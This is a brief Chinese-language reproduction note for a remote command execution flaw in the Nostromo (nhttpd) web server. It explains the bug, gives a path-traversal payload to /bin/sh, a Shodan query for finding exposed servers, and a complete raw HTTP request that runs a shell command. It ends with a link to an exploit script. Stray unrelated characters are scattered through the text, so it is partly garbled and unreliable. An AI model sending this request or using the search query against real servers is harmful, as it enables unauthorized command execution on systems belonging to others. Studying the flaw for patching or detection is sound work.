1忿峻、簡介:
Nostromo web服務(wù)(又名nhttpd)柴淘,這是一個開源的web服務(wù),在Unix系統(tǒng)上非常流行示括,例如FreeBSD, OpenBSD等等
2、漏洞原理:
漏洞原因在于當(dāng)時的web服務(wù)在對URL進行檢查的時機是在URL被解碼前痢畜,因此攻擊者只需將/轉(zhuǎn)換%2f就可繞過檢查
payload:/..%2f..%2f..%2fbin/sh
3垛膝、搜索:
shodan:"Server: nostromo" fofa
4、復(fù)現(xiàn)
數(shù)據(jù)包:
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 >Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en->US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 25 Connection: close Upgrade-Insecure-Requests: 1 echo echo ifconfig 2>&1
5丁稀、exp
https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py
非root權(quán)限
